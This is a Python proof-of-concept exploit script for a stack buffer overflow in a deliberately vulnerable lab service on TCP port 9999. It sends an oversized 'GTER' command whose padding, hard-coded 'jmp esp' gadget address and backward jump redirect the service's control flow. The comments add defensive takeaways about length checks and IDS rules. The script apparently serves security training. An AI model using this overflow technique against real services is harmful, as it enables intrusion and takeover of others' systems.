#! /bin/python3
# Proof-of-concept buffer-overflow client for a deliberately vulnerable lab
# service listening on TCP 9999.  The script opens one connection, reads the
# service's initial output, and sends a single oversized "GTER" command whose
# payload is laid out so that a hard-coded "jmp esp" gadget address overwrites
# the saved return address.  Everything below (offsets, gadget address, jump
# displacement) is specific to the one binary this exercise targets; under
# ASLR/DEP, or against any other build, these constants are simply wrong.
#
# Defensive takeaways: the wire pattern is a short command followed by several
# hundred bytes dominated by a single repeated character, which a length check
# on the server side (or a generic "oversized argument" IDS rule) would stop;
# the root cause is the service copying attacker-controlled input into a fixed
# buffer without bounds checking.
import socket # The module "socket" provides access to the BSD socket interface
import struct # The module "struct" performs conversions between Python values and C structs represented as Python bytes objects.
import sys # The module "sys" provides access to the runtime environment and allows us to gather information about it.
# Check that we have a target IP.  Only the presence of an argument is
# validated; nothing checks that it is actually a well-formed IPv4 address.
if (len(sys.argv) < 2):
    print("This program requires one Command Line Argument. This should be the IPv4 address of the target machine")
    # NOTE(review): `exit` is the interactive-site helper, not guaranteed to exist
    # when the site module is skipped; `sys.exit(1)` is the portable form.
    exit(1)
# Set Constants for later use
HOST = sys.argv[1] # Extract target IP
PORT = 9999 # victim port
# Generate payload, this includes a packed ROP (Encoded)
# so we can change the control flow of the program.
# Layout after the 9-byte command prefix (the arithmetic on the last line keeps
# this portion at exactly 400 bytes):
#   135 bytes padding -> 4-byte return-address overwrite -> 5-byte jump -> filler
PAYLOAD = (
    b'GTER /.:/' +
    b'A' * 135 +
    # jmp esp
    # struct '<L' packs the gadget address as a 32-bit little-endian unsigned
    # value, i.e. the byte order a 32-bit x86 return address has on the stack.
    struct.pack('<L', 0x62501023) +
    # JMP to the start of our buffer
    # 0xE9 is an x86 relative jmp with a 32-bit displacement; the displacement
    # here is negative, so control flows back into the bytes sent before it.
    b'\xe9\x64\xff\xff\xff' + # In exploit 03 GTER_Reuse this is increased
    b'C' * (400 - 135 - 4 - 5)
)
# No timeout is set, so connect() and recv() block indefinitely if the
# service is unreachable or silent.
with socket.create_connection((HOST, PORT)) as fd:
    # Drain whatever the service sends first (presumably a banner) before
    # issuing the command; the content is discarded.
    fd.recv(128)
    fd.sendall(PAYLOAD)